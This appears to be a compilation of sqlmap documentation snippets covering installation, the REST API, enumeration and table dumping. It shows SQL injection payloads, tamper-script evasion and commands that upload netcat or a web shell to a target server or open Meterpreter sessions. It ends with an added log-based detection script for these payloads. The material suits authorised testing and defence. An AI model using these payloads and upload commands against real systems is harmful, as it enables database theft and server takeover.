### Get All sqlmap Options

Source: https://github.com/sqlmapproject/sqlmap/blob/master/README.md

Display a comprehensive list of all available options and switches for sqlmap. Ensure Python is installed.

```bash
python sqlmap.py -hh
```

--------------------------------

### Install and Verify sqlmap

Source: https://context7.com/sqlmapproject/sqlmap/llms.txt

Clone the repository, navigate to the directory, and verify the installation by checking the version. Python 2.7 or 3.x is required.

```bash
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
cd sqlmap-dev
python sqlmap.py --version
```

```bash
python sqlmap.py -h
```

```bash
python sqlmap.py -hh
```

--------------------------------

### Start SQLMap Scan via API Client

Source: https://github.com/sqlmapproject/sqlmap/wiki/Usage

Initiates a new SQLMap scan task using the API client. This example demonstrates starting a scan with a specific URL and options, then checking its status.

```bash
$ python sqlmapapi.py -c -H "192.168.110.1"
[12:47:53] [DEBUG] Example client access from command line:
    $ taskid=$(curl http://192.168.110.1:8775/task/new 2>1 | grep -o -I '[a-f0-9]\{16\}') && echo $taskid
    $ curl -H "Content-Type: application/json" -X POST -d '{"url": "http://testphp.vulnweb.com/artists.php?artist=1"}' http://192.168.110.1:8775/scan/$taskid/start
    $ curl http://192.168.110.1:8775/scan/$taskid/data
    $ curl http://192.168.110.1:8775/scan/$taskid/log
[12:47:53] [INFO] Starting REST-JSON API client to 'http://192.168.110.1:8775'...
[12:47:53] [DEBUG] Calling http://192.168.110.1:8775
[12:47:53] [INFO] Type 'help' or '?' for list of available commands
api> new -u "http://testphp.vulnweb.com/artists.php?artist=1" --banner --flush-session
[12:48:10] [DEBUG] Calling http://192.168.110.1:8775/task/new
[12:48:10] [INFO] New task ID is 'a42ddaef02e976f0'
[12:48:10] [DEBUG] Calling http://192.168.110.1:8775/scan/a42ddaef02e976f0/start
[12:48:10] [INFO] Scanning started
api (a42ddaef02e976f0)> status
[12:48:16] [DEBUG] Calling http://192.168.110.1:8775/scan/a42ddaef02e976f0/status
{
    "status": "running",
    "returncode": null,
    "success": true
}
api (a42ddaef02e976f0)> status
[12:48:50] [DEBUG] Calling http://192.168.110.1:8775/scan/a42ddaef02e976f0/status
{
    "status": "terminated",
    "returncode": 0,
    "success": true
}
api (a42ddaef02e976f0)> log
```

--------------------------------

### Get Basic sqlmap Options

Source: https://github.com/sqlmapproject/sqlmap/blob/master/README.md

Display a list of basic options and switches for sqlmap. This command requires Python to be installed.

```bash
python sqlmap.py -h
```

--------------------------------

### Run SQLMap with Wizard Interface

Source: https://github.com/sqlmapproject/sqlmap/wiki/Usage

Use the `--wizard` flag for an interactive, beginner-friendly setup. This mode asks only a few questions (target URL, POST data, injection difficulty, enumeration depth) and then configures and runs SQLMap with the answers.

```bash
$ python sqlmap.py --wizard

    sqlmap/1.0-dev-2defc30 - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at xx:xx:26

Please enter full target URL (-u): http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1
POST data (--data) [Enter for None]:
Injection difficulty (--level/--risk). Please choose:
[1] Normal (default)
[2] Medium
[3] Hard
> 1
Enumeration (--banner/--current-user/etc). Please choose:
[1] Basic (default)
[2] Smart
[3] All
> 1

sqlmap is running, please wait..

heuristic (parsing) test showed that the back-end DBMS could be 'Microsoft SQL Server'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
do you want to include all tests for 'Microsoft SQL Server' extending provided level (1) and risk (1)? [Y/n] Y
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection points with a total of 25 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 2986=2986

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: id=1 AND 4847=CONVERT(INT,(CHAR(58)+CHAR(118)+CHAR(114)+CHAR(100)+CHAR(58)+(SELECT (CASE WHEN (4847=4847) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(111)+CHAR(109)+CHAR(113)+CHAR(58)))

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=1 UNION ALL SELECT NULL,NULL,CHAR(58)+CHAR(118)+CHAR(114)+CHAR(100)+CHAR(58)+CHAR(70)+CHAR(79)+CHAR(118)+CHAR(106)+CHAR(87)+CHAR(101)+CHAR(119)+CHAR(115)+CHAR(114)+CHAR(77)+CHAR(58)+CHAR(111)+CHAR(109)+CHAR(113)+CHAR(58)--

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: id=1; WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: id=1 WAITFOR DELAY '0:0:5'--

    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: id=(SELECT CHAR(58)+CHAR(118)+CHAR(114)+CHAR(100)+CHAR(58)+(SELECT (CASE WHEN (6382=6382) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(111)+CHAR(109)+CHAR(113)+CHAR(58))
---
web server operating system: Windows XP
web application technology: ASP, Microsoft IIS 5.1
back-end DBMS operating system: Windows XP Service Pack 2
back-end DBMS: Microsoft SQL Server 2005
banner:
---
Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86)
    Oct 14 2005 00:33:37
    Copyright (c) 1988-2005 Microsoft Corporation
    Express Edition on Windows NT 5.1 (Build 2600: Service Pack 2)
---
current user:    'sa'
current database:    'testdb'
current user is DBA:    True

[*] shutting down at xx:xx:52
```

--------------------------------

### Starting a New Scan Task via API

Source: https://github.com/sqlmapproject/sqlmap/wiki/Usage

Example of starting a new SQLMap scan task using the REST-JSON API.

````APIDOC
## Start New Scan Task (API Example)

### Description
This example demonstrates how to start a new SQLMap scan task using `curl` against the REST-JSON API.

### Request

1. Get a new task ID:
   ```bash
   taskid=$(curl http://192.168.110.1:8775/task/new 2>&1 | grep -o -I '[a-f0-9]\{16\}') && echo $taskid
   ```

2. Start the scan with specified URL and options:
   ```bash
   curl -H "Content-Type: application/json" -X POST -d '{"url": "http://testphp.vulnweb.com/artists.php?artist=1"}' http://192.168.110.1:8775/scan/$taskid/start
   ```

### Retrieve Data/Log

* To get scan data:
  ```bash
  curl http://192.168.110.1:8775/scan/$taskid/data
  ```

* To get scan log:
  ```bash
  curl http://192.168.110.1:8775/scan/$taskid/log
  ```

* To get scan status:
  ```bash
  curl http://192.168.110.1:8775/scan/$taskid/status
  ```
````

--------------------------------

### Use Simple Wizard Interface

Source: https://github.com/sqlmapproject/sqlmap/wiki/Usage

Launches a simple wizard interface designed to guide beginner users through SQLMap's functionalities.

```bash
--wizard
```

--------------------------------

### Full API workflow example

Source: https://context7.com/sqlmapproject/sqlmap/llms.txt

This Python script demonstrates a complete sqlmap API workflow: creating a task, starting a scan with specified parameters, polling for status, retrieving results, and deleting the task. It requires the third-party `requests` library; `time` is part of the Python standard library.
```python
import time

import requests

BASE = "http://127.0.0.1:8775"

# 1. Create task
task = requests.get(f"{BASE}/task/new").json()
taskid = task["taskid"]
print(f"Task ID: {taskid}")

# 2. Start scan
payload = {
    "url": "http://testphp.vulnweb.com/artists.php?artist=1",
    "batch": True,
    "level": 1,
    "risk": 1,
    "dbs": True,
    "banner": True
}
start = requests.post(f"{BASE}/scan/{taskid}/start",
                      json=payload,
                      headers={"Content-Type": "application/json"}).json()
print(f"Started: {start}")

# 3. Poll until done
while True:
    status = requests.get(f"{BASE}/scan/{taskid}/status").json()
    print(f"Status: {status['status']}")
    if status["status"] == "terminated":
        break
    time.sleep(5)

# 4. Retrieve results
data = requests.get(f"{BASE}/scan/{taskid}/data").json()
for entry in data.get("data", []):
    print(f"Type {entry['type']}: {entry['value']}")

# 5. Clean up
requests.get(f"{BASE}/task/{taskid}/delete")
```

--------------------------------

### Scan URL with GET Parameters

Source: https://context7.com/sqlmapproject/sqlmap/llms.txt

Perform a basic scan on a URL with GET parameters, including fingerprinting, banner retrieval, and listing users and databases. Assumes a MySQL backend.

```bash
python sqlmap.py -u "http://www.target.com/vuln.php?id=1" -f --banner --dbs --users
```

--------------------------------

### Start SQLMap API Server

Source: https://github.com/sqlmapproject/sqlmap/wiki/Usage

Launches the SQLMap REST-JSON API server. It listens on the specified host and port, ready to accept client connections and manage scan tasks. In this example `-H "0.0.0.0"` binds the server to all network interfaces; without `-H` the default host is 127.0.0.1.

```bash
$ python sqlmapapi.py -s -H "0.0.0.0"
[12:47:51] [INFO] Running REST-JSON API server at '0.0.0.0:8775'..
[12:47:51] [INFO] Admin ID: 89fd118997840a9bd7fc329ab535b881
[12:47:51] [DEBUG] IPC database: /tmp/sqlmapipc-SzBQnd
[12:47:51] [DEBUG] REST-JSON API server connected to IPC database
[12:47:51] [DEBUG] Using adapter 'wsgiref' to run bottle
[12:48:10] [DEBUG] Created new task: 'a42ddaef02e976f0'
[12:48:10] [DEBUG] [a42ddaef02e976f0] Started scan
[12:48:16] [DEBUG] [a42ddaef02e976f0] Retrieved scan status
[12:48:50] [DEBUG] [a42ddaef02e976f0] Retrieved scan status
[12:48:55] [DEBUG] [a42ddaef02e976f0] Retrieved scan log messages
[12:48:59] [DEBUG] [a42ddaef02e976f0] Retrieved scan data and error messages
```

--------------------------------

### Dump a Range of Entries with SQLMap

Source: https://github.com/sqlmapproject/sqlmap/wiki/Usage

Control the range of entries to dump using `--start` and `--stop` options. For example, `--stop 1` dumps the first entry, and `--start 1 --stop 3` dumps the second and third entries.

```bash
python sqlmap.py -D database_name -T table_name --dump --stop 1
```

```bash
python sqlmap.py -D database_name -T table_name --dump --start 1 --stop 3
```

--------------------------------

### Install/Upgrade sqlmap via PyPI

Source: https://github.com/sqlmapproject/sqlmap/wiki/Download-and-update

Install or upgrade sqlmap using pip, the Python package installer. This command ensures you have the latest stable release available on the Python Package Index.

```bash
pip install --upgrade sqlmap
```

--------------------------------

### Check sqlmap Dependencies

Source: https://github.com/sqlmapproject/sqlmap/wiki/Usage

Use the `--dependencies` switch to verify if all necessary third-party libraries for specific sqlmap features are installed. This is crucial for features like direct DBMS connection or specific authentication types.

```bash
$ python sqlmap.py --dependencies
[...]
[xx:xx:28] [WARNING] sqlmap requires 'python-kinterbasdb' third-party library in order to directly connect to the DBMS Firebird. Download from http://kinterbasdb.sourceforge.net/
[xx:xx:28] [WARNING] sqlmap requires 'python-pymssql' third-party library in order to directly connect to the DBMS Sybase. Download from http://pymssql.sourceforge.net/
[xx:xx:28] [WARNING] sqlmap requires 'python pymysql' third-party library in order to directly connect to the DBMS MySQL. Download from https://github.com/petehunt/PyMySQL/
[xx:xx:28] [WARNING] sqlmap requires 'python cx_Oracle' third-party library in order to directly connect to the DBMS Oracle. Download from http://cx-oracle.sourceforge.net/
[xx:xx:28] [WARNING] sqlmap requires 'python-psycopg2' third-party library in order to directly connect to the DBMS PostgreSQL. Download from http://initd.org/psycopg/
[xx:xx:28] [WARNING] sqlmap requires 'python ibm-db' third-party library in order to directly connect to the DBMS IBM DB2. Download from http://code.google.com/p/ibm-db/
[xx:xx:28] [WARNING] sqlmap requires 'python jaydebeapi & python-jpype' third-party library in order to directly connect to the DBMS HSQLDB. Download from https://pypi.python.org/pypi/JayDeBeApi/ & http://jpype.sourceforge.net/
[xx:xx:28] [WARNING] sqlmap requires 'python-pyodbc' third-party library in order to directly connect to the DBMS Microsoft Access. Download from http://pyodbc.googlecode.com/
[xx:xx:28] [WARNING] sqlmap requires 'python-pymssql' third-party library in order to directly connect to the DBMS Microsoft SQL Server. Download from http://pymssql.sourceforge.net/
[xx:xx:28] [WARNING] sqlmap requires 'python-ntlm' third-party library if you plan to attack a web application behind NTLM authentication. Download from http://code.google.com/p/python-ntlm/
[xx:xx:28] [WARNING] sqlmap requires 'websocket-client' third-party library if you plan to attack a web application using WebSocket. Download from https://pypi.python.org/pypi/websocket-client/
```

--------------------------------

### Dump Database Table Entries with SQLMap

Source: https://github.com/sqlmapproject/sqlmap/wiki/Usage

Use the `--dump` switch with `-T` to specify the table and optionally `-D` for the database. If the database is not specified, the current database is used. This example targets a Firebird database.

```bash
$ python sqlmap.py -u "http://192.168.136.131/sqlmap/firebird/get_int.php?id=1" \
  --dump -T users
[...]
Database: Firebird_masterdb
Table: USERS
[4 entries]
+----+--------+------------+
| ID | NAME   | SURNAME    |
+----+--------+------------+
| 1  | luther | blisset    |
| 2  | fluffy | bunny      |
| 3  | wu     | ming       |
| 4  | NULL   | nameisnull |
+----+--------+------------+
```

--------------------------------

### Configure HTTP Basic Authentication in sqlmap

Source: https://github.com/sqlmapproject/sqlmap/wiki/Usage

Specify the HTTP authentication type (`--auth-type`) and credentials (`--auth-cred`) for target applications. This example uses Basic authentication with a username and password.

```bash
$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/basic/get_int.php?id=1" \
  --auth-type Basic --auth-cred "testuser:testpass"
```

--------------------------------

### Count Table Entries with SQLMap

Source: https://github.com/sqlmapproject/sqlmap/wiki/Usage

Use the `--count` switch to determine the number of entries in specified tables before dumping data. This example targets a Microsoft SQL Server.

```bash
$ python sqlmap.py -u "http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1" --count -D testdb
[...]
Database: testdb
+----------------+---------+
| Table          | Entries |
+----------------+---------+
| dbo.users      | 4       |
| dbo.users_blob | 2       |
+----------------+---------+
```

--------------------------------

### Execute SQLMap with Tamper Scripts

Source: https://github.com/sqlmapproject/sqlmap/wiki/Usage

Example of running SQLMap with multiple tamper scripts to bypass weak input validation. It specifies the target URL, tamper scripts, and verbosity level.

```bash
$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int.php?id=1" \
  --tamper tamper/between.py,tamper/randomcase.py,tamper/space2comment.py -v 3

[hh:mm:03] [DEBUG] cleaning up configuration parameters
[hh:mm:03] [INFO] loading tamper script 'between'
[hh:mm:03] [INFO] loading tamper script 'randomcase'
[hh:mm:03] [INFO] loading tamper script 'space2comment'
[...]
[hh:mm:04] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[hh:mm:04] [PAYLOAD] 1)/**/And/**/1369=7706/**/And/**/(4092=4092
[hh:mm:04] [PAYLOAD] 1)/**/AND/**/9267=9267/**/AND/**/(4057=4057
[hh:mm:04] [PAYLOAD] 1/**/AnD/**/950=7041
[...]
[hh:mm:04] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[hh:mm:04] [PAYLOAD] 1/**/anD/**/(SELeCt/**/9921/**/fROm(SELeCt/**/counT(*),CONCAT(cHar(58,117,113,107,58),(SELeCt/**/(case/**/whEN/**/(9921=9921)/**/THeN/**/1/**/elsE/**/0/**/ENd)),cHar(58,106,104,104,58),FLOOR(RanD(0)*2))x/**/fROm/**/information_schema.tables/**/group/**/bY/**/x)a)
[hh:mm:04] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
[...]
```

--------------------------------

### Establish Out-of-Band Connection with SQLMAP

Source: https://github.com/sqlmapproject/sqlmap/wiki/Usage

Use this command to establish an out-of-band connection to the database server's operating system, enabling features like Meterpreter sessions. Requires Metasploit Framework to be installed and configured.

```bash
python sqlmap.py -u "http://192.168.136.129/sqlmap/mysql/iis/get_int_55.aspx?id=1" --os-pwn --msf-path /software/metasploit
```

--------------------------------

### Execute sqlmap on Windows

Source: https://github.com/sqlmapproject/sqlmap/wiki/FAQ

Run this command in a Windows terminal to execute sqlmap and view its basic help message. Replace C:\PythonXX with your Python installation path.
```batch
C:\PythonXX\python.exe sqlmap.py -h
```

--------------------------------

### Set Custom HTTP Headers with sqlmap

Source: https://github.com/sqlmapproject/sqlmap/wiki/Usage

Use the `--headers` option to provide multiple custom HTTP headers, separated by newlines, for sqlmap requests. This example demonstrates setting Host and User-agent.

```bash
$ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?id=1" -z \
"ign,flu,bat,tec=E" --headers="Host:www.target.com\nUser-agent:Firefox 1.0" -v 5
[...]
[xx:xx:44] [TRAFFIC OUT] HTTP request [#5]:
GET /sqlmap/mysql/get_int.php?id=1%20AND%20%28SELECT%209351%20FROM%28SELECT%20C\
OUNT%28%2A%29%2CCONCAT%280x3a6161733a[...]x3a6c666d3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARA\
CTER_SETS%20GROUP%20BY%20x%29a\
29 HTTP/1.1
Host: www.target.com
Accept-encoding: gzip,deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-agent: Firefox 1.0
Connection: close
[...]
```

--------------------------------

### Specify Testable Parameters with -p

Source: https://github.com/sqlmapproject/sqlmap/wiki/Usage

Use the `-p` option to manually specify a comma-separated list of parameters (GET or POST) that sqlmap should test. This bypasses the default behavior and the dependency on the `--level` option. The command below does not use `-p`: it shows the related URI case, where an asterisk (`*`) appended to a value inside the URI path marks that position as the injection point, because sqlmap does not test URI paths unless they are marked this way.

```bash
python sqlmap.py -u "http://targeturl/param1/value1*/param2/value2/"
```

--------------------------------

### Read File from Database Server with SQLMap

Source: https://github.com/sqlmapproject/sqlmap/wiki/Usage

Retrieve file content from the database server's file system using the `--file-read` option. This is supported for MySQL, PostgreSQL, and Microsoft SQL Server, provided the session user has sufficient privileges. The example demonstrates reading a binary file from a Microsoft SQL Server 2005 target.
```bash
python sqlmap.py -u "http://192.168.136.129/sqlmap/mssql/iis/get_str2.asp?name=luther" --file-read "C:/example.exe" -v 1
```

```bash
ls -l output/192.168.136.129/files/C__example.exe
```

```bash
file output/192.168.136.129/files/C__example.exe
```

--------------------------------

### SQLMap API Server Help

Source: https://github.com/sqlmapproject/sqlmap/wiki/Usage

Displays the available options for running the SQLMap API server. Use this to understand command-line arguments for server configuration.

```bash
$ python sqlmapapi.py -hh
Usage: sqlmapapi.py [options]

Options:
  -h, --help            show this help message and exit
  -s, --server          Act as a REST-JSON API server
  -c, --client          Act as a REST-JSON API client
  -H HOST, --host=HOST  Host of the REST-JSON API server (default "127.0.0.1")
  -p PORT, --port=PORT  Port of the the REST-JSON API server (default 8775)
  --adapter=ADAPTER     Server (bottle) adapter to use (default "wsgiref")
```

--------------------------------

### SQLMap Project Initialization Files

Source: https://github.com/sqlmapproject/sqlmap/blob/master/data/txt/sha256sums.txt

These are Python `__init__.py` files, typically used to mark directories as Python packages. They are present in various utility subdirectories. The entry below is the file's SHA-256 checksum line from `sha256sums.txt`, not Python source.

```text
1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 extra/__init__.py
```

--------------------------------

### List All Databases with SQLMap

Source: https://github.com/sqlmapproject/sqlmap/wiki/Usage

Use the `--dbs` switch to enumerate a list of all available databases. This requires the session user to have read access to the system table containing database information.

```bash
sqlmap -u "http://example.com/page?id=1" --dbs
```

--------------------------------

### SQLMap UNION Query Payload

Source: https://github.com/sqlmapproject/sqlmap/wiki/Usage

A UNION query payload example for SQLMap, typically used when the application returns the results of a SELECT statement directly in the HTTP response. This example targets a 3-column NULL scenario.

```sql
artist=-7983 UNION ALL SELECT CONCAT(0x716b706271,0x6f6c506a747376426d58446f634454616a4c647a6c6a69566e584e454c64666f6861466e697a5069,0x716a786a71),NULL,NULL-- -
```

--------------------------------

### API Task Status Response

Source: https://github.com/sqlmapproject/sqlmap/wiki/Usage

Example response structure for retrieving the status of a scan task.

````APIDOC
## API Task Status Response

### Description
This shows the typical JSON response when querying the status of a scan task via the API.

### Response Example (Success)
```json
{
    "status": "running",
    "returncode": null,
    "success": true
}
```

### Response Example (Terminated)
```json
{
    "status": "terminated",
    "returncode": 0,
    "success": true
}
```
````

--------------------------------

### Upload File to Database Server with SQLMap

Source: https://github.com/sqlmapproject/sqlmap/wiki/Usage

Use `--file-write` and `--file-dest` to upload a local file to the database server's file system. This is applicable for MySQL, PostgreSQL, and Microsoft SQL Server when the user has sufficient privileges. The file can be textual or binary.

```bash
$ file /software/nc.exe.packed
/software/nc.exe.packed: PE32 executable for MS Windows (console) Intel 80386 32-bit

$ ls -l /software/nc.exe.packed
-rwxr-xr-x 1 inquis inquis 31744 2009-MM-DD hh:mm /software/nc.exe.packed

$ python sqlmap.py -u "http://192.168.136.129/sqlmap/mysql/get_int.aspx?id=1" --file-write "/software/nc.exe.packed" --file-dest "C:/WINDOWS/Temp/nc.exe" -v 1

[...]
[hh:mm:29] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003 or 2008
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: MySQL >= 5.0.0

[...]
do you want confirmation that the file 'C:/WINDOWS/Temp/nc.exe' has been successfully written on the back-end DBMS file system? [Y/n] y
[hh:mm:52] [INFO] retrieved: 31744
[hh:mm:52] [INFO] the file has been successfully written and its size is 31744 bytes, same size as the local file '/software/nc.exe.packed'
```

--------------------------------

### C++ Source Code for Runcmd Precompiled Header (H)

Source: https://github.com/sqlmapproject/sqlmap/blob/master/data/txt/sha256sums.txt

This C++ header file is part of the precompiled header setup for the 'runcmd' utility. The entry below is the file's SHA-256 checksum line from `sha256sums.txt`, not C++ source.

```text
e278d40d3121d757c2e1b8cc8192397e5014f663fbf6d80dd1118443d4fc9442 extra/runcmd/src/runcmd/stdafx.h
```

--------------------------------

### Interactive SQLMap Shell Commands

Source: https://github.com/sqlmapproject/sqlmap/wiki/Usage

Demonstrates interactive commands within the SQLMap shell, including setting the target URL, requesting the banner, and exiting the shell. This is useful for live testing and exploration.

```bash
sqlmap-shell> -u "http://testphp.vulnweb.com/artists.php?artist=1" --banner
```

```bash
sqlmap-shell> exit
```

--------------------------------

### C++ Source Code for Runcmd Precompiled Header (CPP)

Source: https://github.com/sqlmapproject/sqlmap/blob/master/data/txt/sha256sums.txt

This C++ source file is part of the precompiled header setup for the 'runcmd' utility. The entry below is the file's SHA-256 checksum line from `sha256sums.txt`, not C++ source.

```text
d4186cac6e736bdfe64db63aa00395a862b5fe5c78340870f0c79cae05a79e7d extra/runcmd/src/runcmd/stdafx.cpp
```

--------------------------------

### Upload Files to Server with SQLMap

Source: https://context7.com/sqlmapproject/sqlmap/llms.txt

Uploads a local file to the database server's file system, useful for deploying web shells.

```bash
python sqlmap.py -u "http://192.168.1.129/vuln.aspx?id=1" \
  --file-write "/local/path/shell.php" \
  --file-dest "C:/inetpub/wwwroot/uploads/shell.php" -v 1
```

--------------------------------

### SQLMap Boolean-Based Blind Payload

Source: https://github.com/sqlmapproject/sqlmap/wiki/Usage

An example of a boolean-based blind SQL injection payload used by SQLMap. This type of injection relies on observing true/false responses from the database.

```sql
artist=1 AND 5707=5707
```
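
The payload shapes printed in the sample output on this page (boolean-based `AND n=n`, `UNION ALL SELECT`, `WAITFOR DELAY`, the `CONVERT(INT,...)` and `FLOOR(RAND(0)*2)` error-based forms, and the `/**/` and mixed-case variants produced by the tamper scripts) can be matched in web server access logs. The following is an added detection example, not code from sqlmap or from the original page; the log lines, paths, function names and signature names are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Signatures modelled on the payload shapes printed in the output on this page.
SIGNATURES = {
    "boolean-blind": re.compile(r"\b(?:and|or)\s+\(?\d+\s*=\s*\d+"),
    "union-query": re.compile(r"\bunion\s+all\s+select\b"),
    "time-or-stacked": re.compile(r"\bwaitfor\s+delay\b"),
    "error-based": re.compile(r"convert\(int,|floor\(rand\(0\)\*2\)"),
    "char-chain": re.compile(r"(?:char\(\d+\)\+){3,}"),
}

# Common/combined access-log prefix: client, identity, user, [time], "request"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*"'
)

# Constructed sample lines (documentation IP ranges, hypothetical paths).
SAMPLE_LOG = """\
198.51.100.7 - - [10/Oct/2024:13:55:36 +0000] "GET /artists.php?artist=1%20AND%205707=5707 HTTP/1.1" 200 512
198.51.100.7 - - [10/Oct/2024:13:55:37 +0000] "GET /get_int.php?id=1/**/AnD/**/950=7041 HTTP/1.1" 200 498
198.51.100.7 - - [10/Oct/2024:13:55:38 +0000] "GET /get_int.asp?id=1;%20WAITFOR%20DELAY%20'0:0:5'-- HTTP/1.1" 200 0
198.51.100.7 - - [10/Oct/2024:13:55:39 +0000] "GET /get_int.asp?id=1%20UNION%20ALL%20SELECT%20NULL,NULL,CHAR(58)%2BCHAR(118)%2BCHAR(114)%2BCHAR(100)-- HTTP/1.1" 200 734
198.51.100.7 - - [10/Oct/2024:13:55:40 +0000] "GET /get_int.php?id=1/**/anD/**/(SELeCt/**/counT(*),FLOOR(RanD(0)*2)) HTTP/1.1" 500 211
203.0.113.20 - - [10/Oct/2024:13:56:01 +0000] "GET /search.php?q=rock+and+roll&page=2 HTTP/1.1" 200 1024
203.0.113.20 - - [10/Oct/2024:13:56:05 +0000] "GET /artists.php?artist=1 HTTP/1.1" 200 2048
"""


def normalise(query):
    """Undo URL encoding and the space2comment/randomcase transformations."""
    text = unquote_plus(query)
    text = re.sub(r"/\*.*?\*/", " ", text)  # inline comments used as spaces
    text = re.sub(r"\s+", " ", text)        # collapse whitespace runs
    return text.lower()                     # AnD / SELeCt -> and / select


def classify(line):
    """Return (client_ip, sorted signature names) for a suspicious line, else None."""
    match = LOG_RE.match(line)
    if not match:
        return None
    _, _, query = match.group("target").partition("?")
    text = normalise(query)
    hits = sorted(name for name, rx in SIGNATURES.items() if rx.search(text))
    return (match.group("ip"), hits) if hits else None


def scan(log_text):
    """Map each client IP to the sorted list of signatures it triggered."""
    seen = {}
    for line in log_text.splitlines():
        result = classify(line)
        if result:
            ip, hits = result
            seen.setdefault(ip, set()).update(hits)
    return {ip: sorted(names) for ip, names in seen.items()}


if __name__ == "__main__":
    for ip, names in scan(SAMPLE_LOG).items():
        print(ip, ", ".join(names))
```

Access logs record only the request line, so payloads carried in POST bodies, cookies or custom headers are invisible to this check; it covers GET parameters such as the `id` and `artist` examples above.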